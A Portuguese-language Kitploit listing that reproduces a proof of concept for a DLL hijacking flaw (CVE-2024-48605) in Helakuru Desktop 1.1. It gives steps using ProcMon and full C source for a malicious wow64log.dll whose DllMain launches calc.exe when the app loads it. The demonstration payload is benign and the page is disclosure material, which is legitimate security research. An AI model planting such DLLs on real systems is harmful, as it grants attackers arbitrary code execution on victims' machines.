Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
HelakuruV.1.1-DLLHijack — Helakuru Versão 1.1 DLL Hijack - CVE-2024-48605 | Kitploit
Ferramentas/GitHubGitHub/surajhacx/helakuruv.1.1-dllhijack
Análise de VulnerabilidadesAnálise de CódigoExploraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubsurajhacx/helakuruv.1.1-dllhijack

HelakuruV.1.1-DLLHijack

Helakuru Versão 1.1 DLL Hijack - CVE-2024-48605

Ver Repositório
536há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade de DLL Hijacking no Helakuru

Resumo

O Helakuru Desktop versão 1.1v opera em arquiteturas de 64 bits e 32 bits. Durante os testes, foi identificado que o programa tenta carregar a wow64log.dll, que não é incluída por padrão nos sistemas operacionais Windows modernos. Isso resulta em um erro 'Name not found', expondo o programa a uma vulnerabilidade de DLL Hijacking. Ao criar uma wow64log.dll maliciosa, é possível obter execução arbitrária de código.

Versão Afetada

Helakuru Desktop 1.1v

Passos para Reproduzir

  1. Monitore o carregamento de DLLs com o ProcMon
  • ProcMon mostrando a operação CreateFile com "Name not found" para wow64log.dll Pasted image 20240925232040
  1. Crie uma wow64log.dll maliciosa
root@kitploit:~
#include <windows.h>
#include <stdio.h>

void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    const char* calcCmd = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,          
        (LPSTR)calcCmd, 
        NULL,          
        NULL,          
        FALSE,         
        0,             
        NULL,          
        NULL,          
        &si,           
        &pi))          
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
  1. Execute o Helakuru Desktop
  • Inicie o Helakuru Desktop novamente. A wow64log.dll maliciosa será agora carregada no programa, acionando a Calculadora como demonstração de injeção de DLL bem-sucedida. Pasted image 20240925233737
  1. Verifique o carregamento da DLL usando o ProcMon
  • Reabra o ProcMon e observe que a wow64log.dll foi carregada com sucesso desta vez, confirmando que a DLL personalizada foi executada pelo programa. Pasted image 20240925232728

Impacto: Esta vulnerabilidade permite a execução arbitrária de código.

Baixar ferramenta